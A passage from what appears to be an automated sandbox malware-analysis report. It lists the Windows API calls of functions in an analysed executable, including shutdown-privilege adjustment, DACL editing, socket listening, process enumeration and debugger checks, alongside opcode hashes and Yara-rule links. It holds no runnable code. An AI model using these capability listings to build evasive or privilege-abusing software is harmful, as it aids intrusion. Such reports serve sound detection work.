                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                                                      • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                                    • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                    • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                                                    • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                    • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                                                    Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00433414
                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                    • API String ID: 2938487562-3733053543
                                                                                                                                                    • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                    • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                                                    • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                    • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                                                    Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                                                      • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                                                      • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1255039815-0
                                                                                                                                                    • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                    • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                                                    • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                    • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                                                    Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __swprintf.LIBCMT ref: 00433073
                                                                                                                                                    • __swprintf.LIBCMT ref: 00433085
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                                                    • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1158019794-0
                                                                                                                                                    • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                    • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                                                    • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                    • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                                                    Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                    • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                                    • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                                                    • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                                    • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                                                    Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                                    • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                    • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                                                    • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                    • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                                                    Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$_strncmp
                                                                                                                                                    • String ID: @oH$\$^$h
                                                                                                                                                    • API String ID: 2175499884-3701065813
                                                                                                                                                    • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                                    • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                                                    • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                                    • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                                                    Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                                                    • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 540024437-0
                                                                                                                                                    • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                    • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                                                    • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                    • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                                                    Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                                    • API String ID: 0-2872873767
                                                                                                                                                    • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                    • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                                                    • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                    • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                                                    Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                    • _wcscat.LIBCMT ref: 00475657
                                                                                                                                                    • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2547909840-0
                                                                                                                                                    • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                    • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                                                    • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                    • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                                                    Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                                                    • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                                                    • String ID: *.*$\VH
                                                                                                                                                    • API String ID: 2786137511-2657498754
                                                                                                                                                    • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                    • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                                                    • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                    • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                                                    Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
